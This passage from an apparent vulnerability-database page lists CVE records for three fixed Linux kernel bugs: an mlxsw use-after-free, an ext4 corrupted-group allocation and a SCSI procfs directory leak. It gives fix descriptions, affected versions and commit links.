"dateUpdated": "2024-08-02T03:21:47.699Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e118e7ea24d1392878ef85926627c6bc640c4388"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a429a912d6c779807f4d72a6cc0a1efaaa3613e1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4c89642ca47fb620914780c7c51d8d1248201121"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/813e2ab753a8f8c243a39ede20c2e0adc15f3887"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/311eeaa7b9e26aba5b3d57b09859f07d8e9fc049"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a02687044e124f8ccb427cd3632124a4e1a7d7c1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/54225988889931467a9b55fdbef534079b665519"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e118e7ea24d1392878ef85926627c6bc640c4388",
"status": "affected",
"version": "c9c9af91f1d9a636aecc55302c792538e549a430",
"versionType": "git"
},
{
"lessThan": "a429a912d6c779807f4d72a6cc0a1efaaa3613e1",
"status": "affected",
"version": "c9c9af91f1d9a636aecc55302c792538e549a430",
"versionType": "git"
},
{
"lessThan": "4c89642ca47fb620914780c7c51d8d1248201121",
"status": "affected",
"version": "c9c9af91f1d9a636aecc55302c792538e549a430",
"versionType": "git"
},
{
"lessThan": "813e2ab753a8f8c243a39ede20c2e0adc15f3887",
"status": "affected",
"version": "c9c9af91f1d9a636aecc55302c792538e549a430",
"versionType": "git"
},
{
"lessThan": "311eeaa7b9e26aba5b3d57b09859f07d8e9fc049",
"status": "affected",
"version": "c9c9af91f1d9a636aecc55302c792538e549a430",
"versionType": "git"
},
{
"lessThan": "a02687044e124f8ccb427cd3632124a4e1a7d7c1",
"status": "affected",
"version": "c9c9af91f1d9a636aecc55302c792538e549a430",
"versionType": "git"
},
{
"lessThan": "54225988889931467a9b55fdbef534079b665519",
"status": "affected",
"version": "c9c9af91f1d9a636aecc55302c792538e549a430",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.1"
},
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.158",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.30",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.158",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.90",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.30",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.9",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_acl_tcam: Fix possible use-after-free during rehash\n\nThe rehash delayed work migrates filters from one region to another\naccording to the number of available credits.\n\nThe migrated from region is destroyed at the end of the work if the\nnumber of credits is non-negative as the assumption is that this is\nindicative of migration being complete. This assumption is incorrect as\na non-negative number of credits can also be the result of a failed\nmigration.\n\nThe destruction of a region that still has filters referencing it can\nresult in a use-after-free [1].\n\nFix by not destroying the region if migration failed.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_acl_ctcam_region_entry_remove+0x21d/0x230\nRead of size 8 at addr ffff8881735319e8 by task kworker/0:31/3858\n\nCPU: 0 PID: 3858 Comm: kworker/0:31 Tainted: G W 6.9.0-rc2-custom-00782-gf2275c2157d8 #5\nHardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019\nWorkqueue: mlxsw_core mlxsw_sp_acl_tcam_vregion_rehash_work\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xc6/0x120\n print_report+0xce/0x670\n kasan_report+0xd7/0x110\n mlxsw_sp_acl_ctcam_region_entry_remove+0x21d/0x230\n mlxsw_sp_acl_ctcam_entry_del+0x2e/0x70\n mlxsw_sp_acl_atcam_entry_del+0x81/0x210\n mlxsw_sp_acl_tcam_vchunk_migrate_all+0x3cd/0xb50\n mlxsw_sp_acl_tcam_vregion_rehash_work+0x157/0x1300\n process_one_work+0x8eb/0x19b0\n worker_thread+0x6c9/0xf70\n kthread+0x2c9/0x3b0\n ret_from_fork+0x4d/0x80\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\nAllocated by task 174:\n kasan_save_stack+0x33/0x60\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x8f/0xa0\n __kmalloc+0x19c/0x360\n mlxsw_sp_acl_tcam_region_create+0xdf/0x9c0\n mlxsw_sp_acl_tcam_vregion_rehash_work+0x954/0x1300\n process_one_work+0x8eb/0x19b0\n worker_thread+0x6c9/0xf70\n kthread+0x2c9/0x3b0\n ret_from_fork+0x4d/0x80\n ret_from_fork_asm+0x1a/0x30\n\nFreed by task 7:\n kasan_save_stack+0x33/0x60\n kasan_save_track+0x14/0x30\n kasan_save_free_info+0x3b/0x60\n poison_slab_object+0x102/0x170\n __kasan_slab_free+0x14/0x30\n kfree+0xc1/0x290\n mlxsw_sp_acl_tcam_region_destroy+0x272/0x310\n mlxsw_sp_acl_tcam_vregion_rehash_work+0x731/0x1300\n process_one_work+0x8eb/0x19b0\n worker_thread+0x6c9/0xf70\n kthread+0x2c9/0x3b0\n ret_from_fork+0x4d/0x80\n ret_from_fork_asm+0x1a/0x30"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:06:54.144Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e118e7ea24d1392878ef85926627c6bc640c4388"
},
{
"url": "https://git.kernel.org/stable/c/a429a912d6c779807f4d72a6cc0a1efaaa3613e1"
},
{
"url": "https://git.kernel.org/stable/c/4c89642ca47fb620914780c7c51d8d1248201121"
},
{
"url": "https://git.kernel.org/stable/c/813e2ab753a8f8c243a39ede20c2e0adc15f3887"
},
{
"url": "https://git.kernel.org/stable/c/311eeaa7b9e26aba5b3d57b09859f07d8e9fc049"
},
{
"url": "https://git.kernel.org/stable/c/a02687044e124f8ccb427cd3632124a4e1a7d7c1"
},
{
"url": "https://git.kernel.org/stable/c/54225988889931467a9b55fdbef534079b665519"
}
],
"title": "mlxsw: spectrum_acl_tcam: Fix possible use-after-free during rehash",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35854",
"datePublished": "2024-05-17T14:47:30.775Z",
"dateReserved": "2024-05-17T13:50:33.106Z",
"dateUpdated": "2025-05-04T09:06:54.144Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26773 (GCVE-0-2024-26773)
Vulnerability from cvelistv5
Published
2024-04-03 17:00
Modified
2025-05-04 08:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ext4: avoid allocating blocks from corrupted group in ext4_mb_try_best_found()
Determine if the group block bitmap is corrupted before using ac_b_ex in
ext4_mb_try_best_found() to avoid allocating blocks from a group with a
corrupted block bitmap in the following concurrency and making the
situation worse.
ext4_mb_regular_allocator
ext4_lock_group(sb, group)
ext4_mb_good_group
// check if the group bbitmap is corrupted
ext4_mb_complex_scan_group
// Scan group gets ac_b_ex but doesn't use it
ext4_unlock_group(sb, group)
ext4_mark_group_bitmap_corrupted(group)
// The block bitmap was corrupted during
// the group unlock gap.
ext4_mb_try_best_found
ext4_lock_group(ac->ac_sb, group)
ext4_mb_use_best_found
mb_mark_used
// Allocating blocks in block bitmap corrupted group
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26773",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-03T18:50:26.209110Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:49:10.181Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.512Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/21f8cfe79f776287459343e9cfa6055af61328ea"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/260fc96283c0f594de18a1b045faf6d8fb42874d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/927794a02169778c9c2e7b25c768ab3ea8c1dc03"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4c21fa60a6f4606f6214a38f50612b17b2f738f5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f97e75fa4e12b0aa0224e83fcbda8853ac2adf36"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0184747b552d6b5a14db3b7fcc3b792ce64dedd1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a2576ae9a35c078e488f2c573e9e6821d651fbbe"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4530b3660d396a646aad91a787b6ab37cf604b53"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/ext4/mballoc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "21f8cfe79f776287459343e9cfa6055af61328ea",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "260fc96283c0f594de18a1b045faf6d8fb42874d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "927794a02169778c9c2e7b25c768ab3ea8c1dc03",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "4c21fa60a6f4606f6214a38f50612b17b2f738f5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f97e75fa4e12b0aa0224e83fcbda8853ac2adf36",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "0184747b552d6b5a14db3b7fcc3b792ce64dedd1",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a2576ae9a35c078e488f2c573e9e6821d651fbbe",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "4530b3660d396a646aad91a787b6ab37cf604b53",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/ext4/mballoc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.308",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.308",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.270",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: avoid allocating blocks from corrupted group in ext4_mb_try_best_found()\n\nDetermine if the group block bitmap is corrupted before using ac_b_ex in\next4_mb_try_best_found() to avoid allocating blocks from a group with a\ncorrupted block bitmap in the following concurrency and making the\nsituation worse.\n\next4_mb_regular_allocator\n ext4_lock_group(sb, group)\n ext4_mb_good_group\n // check if the group bbitmap is corrupted\n ext4_mb_complex_scan_group\n // Scan group gets ac_b_ex but doesn\u0027t use it\n ext4_unlock_group(sb, group)\n ext4_mark_group_bitmap_corrupted(group)\n // The block bitmap was corrupted during\n // the group unlock gap.\n ext4_mb_try_best_found\n ext4_lock_group(ac-\u003eac_sb, group)\n ext4_mb_use_best_found\n mb_mark_used\n // Allocating blocks in block bitmap corrupted group"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:56:11.135Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/21f8cfe79f776287459343e9cfa6055af61328ea"
},
{
"url": "https://git.kernel.org/stable/c/260fc96283c0f594de18a1b045faf6d8fb42874d"
},
{
"url": "https://git.kernel.org/stable/c/927794a02169778c9c2e7b25c768ab3ea8c1dc03"
},
{
"url": "https://git.kernel.org/stable/c/4c21fa60a6f4606f6214a38f50612b17b2f738f5"
},
{
"url": "https://git.kernel.org/stable/c/f97e75fa4e12b0aa0224e83fcbda8853ac2adf36"
},
{
"url": "https://git.kernel.org/stable/c/0184747b552d6b5a14db3b7fcc3b792ce64dedd1"
},
{
"url": "https://git.kernel.org/stable/c/a2576ae9a35c078e488f2c573e9e6821d651fbbe"
},
{
"url": "https://git.kernel.org/stable/c/4530b3660d396a646aad91a787b6ab37cf604b53"
}
],
"title": "ext4: avoid allocating blocks from corrupted group in ext4_mb_try_best_found()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26773",
"datePublished": "2024-04-03T17:00:59.757Z",
"dateReserved": "2024-02-19T14:20:24.176Z",
"dateUpdated": "2025-05-04T08:56:11.135Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26935 (GCVE-0-2024-26935)
Vulnerability from cvelistv5
Published
2024-05-01 05:17
Modified
2025-05-04 12:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: core: Fix unremoved procfs host directory regression
Commit fc663711b944 ("scsi: core: Remove the /proc/scsi/${proc_name}
directory earlier") fixed a bug related to modules loading/unloading, by
adding a call to scsi_proc_hostdir_rm() on scsi_remove_host(). But that led
to a potential duplicate call to the hostdir_rm() routine, since it's also
called from scsi_host_dev_release(). That triggered a regression report,
which was then fixed by commit be03df3d4bfe ("scsi: core: Fix a procfs host
directory removal regression"). The fix just dropped the hostdir_rm() call
from dev_release().
But it happens that this proc directory is created on scsi_host_alloc(),
and that function "pairs" with scsi_host_dev_release(), while
scsi_remove_host() pairs with scsi_add_host(). In other words, it seems the
reason for removing the proc directory on dev_release() was meant to cover
cases in which a SCSI host structure was allocated, but the call to
scsi_add_host() didn't happen. And that pattern happens to exist in some
error paths, for example.
Syzkaller causes that by using USB raw gadget device, error'ing on
usb-storage driver, at usb_stor_probe2(). By checking that path, we can see
that the BadDevice label leads to a scsi_host_put() after a SCSI host
allocation, but there's no call to scsi_add_host() in such path. That leads
to messages like this in dmesg (and a leak of the SCSI host proc
structure):
usb-storage 4-1:87.51: USB Mass Storage device detected
proc_dir_entry 'scsi/usb-storage' already registered
WARNING: CPU: 1 PID: 3519 at fs/proc/generic.c:377 proc_register+0x347/0x4e0 fs/proc/generic.c:376
The proper fix seems to still call scsi_proc_hostdir_rm() on dev_release(),
but guard that with the state check for SHOST_CREATED; there is even a
comment in scsi_host_dev_release() detailing that: such conditional is
meant for cases where the SCSI host was allocated but there was no calls to
{add,remove}_host(), like the usb-storage case.
This is what we propose here and with that, the error path of usb-storage
does not trigger the warning anymore.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 88c3d3bb6469cea929ac68fd326bdcbefcdfdd83 Version: 68c665bb185037e7eb66fb792c61da9d7151e99c Version: 2a764d55e938743efa7c2cba7305633bcf227f09 Version: 7e0ae8667fcdd99d1756922e1140cac75f5fa279 Version: be03df3d4bfe7e8866d4aa43d62e648ffe884f5f Version: be03df3d4bfe7e8866d4aa43d62e648ffe884f5f Version: be03df3d4bfe7e8866d4aa43d62e648ffe884f5f Version: be03df3d4bfe7e8866d4aa43d62e648ffe884f5f Version: 73f030d4ef6d1ad17f824a0a2eb637ef7a9c7d51 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26935",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-21T14:41:52.902192Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-21T14:42:04.057Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.717Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0053f15d50d50c9312d8ab9c11e2e405812dfcac"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5c2386ba80e779a92ec3bb64ccadbedd88f779b1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cea234bb214b17d004dfdccce4491e6ff57c96ee"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3678cf67ff7136db1dd3bf63c361650db5d92889"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d4c34782b6d7b1e68d18d9549451b19433bd4c6c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e293c773c13b830cdc251f155df2254981abc320"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f4ff08fab66eb5c0b97e1a24edac052fb40bf5d7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f23a4d6e07570826fe95023ca1aa96a011fa9f84"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/scsi/hosts.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "0053f15d50d50c9312d8ab9c11e2e405812dfcac",
"status": "affected",
"version": "88c3d3bb6469cea929ac68fd326bdcbefcdfdd83",
"versionType": "git"
},
{
"lessThan": "5c2386ba80e779a92ec3bb64ccadbedd88f779b1",
"status": "affected",
"version": "68c665bb185037e7eb66fb792c61da9d7151e99c",
"versionType": "git"
},
{
"lessThan": "cea234bb214b17d004dfdccce4491e6ff57c96ee",
"status": "affected",
"version": "2a764d55e938743efa7c2cba7305633bcf227f09",
"versionType": "git"
},
{
"lessThan": "3678cf67ff7136db1dd3bf63c361650db5d92889",
"status": "affected",
"version": "7e0ae8667fcdd99d1756922e1140cac75f5fa279",
"versionType": "git"
},
{
"lessThan": "d4c34782b6d7b1e68d18d9549451b19433bd4c6c",
"status": "affected",
"version": "be03df3d4bfe7e8866d4aa43d62e648ffe884f5f",
"versionType": "git"
},
{
"lessThan": "e293c773c13b830cdc251f155df2254981abc320",
"status": "affected",
"version": "be03df3d4bfe7e8866d4aa43d62e648ffe884f5f",
"versionType": "git"
},
{
"lessThan": "f4ff08fab66eb5c0b97e1a24edac052fb40bf5d7",
"status": "affected",
"version": "be03df3d4bfe7e8866d4aa43d62e648ffe884f5f",
"versionType": "git"
},
{
"lessThan": "f23a4d6e07570826fe95023ca1aa96a011fa9f84",
"status": "affected",
"version": "be03df3d4bfe7e8866d4aa43d62e648ffe884f5f",
"versionType": "git"
},
{
"status": "affected",
"version": "73f030d4ef6d1ad17f824a0a2eb637ef7a9c7d51",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/scsi/hosts.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.3"
},
{
"lessThan": "6.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "5.4.238",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.10.176",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "5.15.104",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "6.1.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "6.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "6.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "6.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "6.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.2.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: core: Fix unremoved procfs host directory regression\n\nCommit fc663711b944 (\"scsi: core: Remove the /proc/scsi/${proc_name}\ndirectory earlier\") fixed a bug related to modules loading/unloading, by\nadding a call to scsi_proc_hostdir_rm() on scsi_remove_host(). But that led\nto a potential duplicate call to the hostdir_rm() routine, since it\u0027s also\ncalled from scsi_host_dev_release(). That triggered a regression report,\nwhich was then fixed by commit be03df3d4bfe (\"scsi: core: Fix a procfs host\ndirectory removal regression\"). The fix just dropped the hostdir_rm() call\nfrom dev_release().\n\nBut it happens that this proc directory is created on scsi_host_alloc(),\nand that function \"pairs\" with scsi_host_dev_release(), while\nscsi_remove_host() pairs with scsi_add_host(). In other 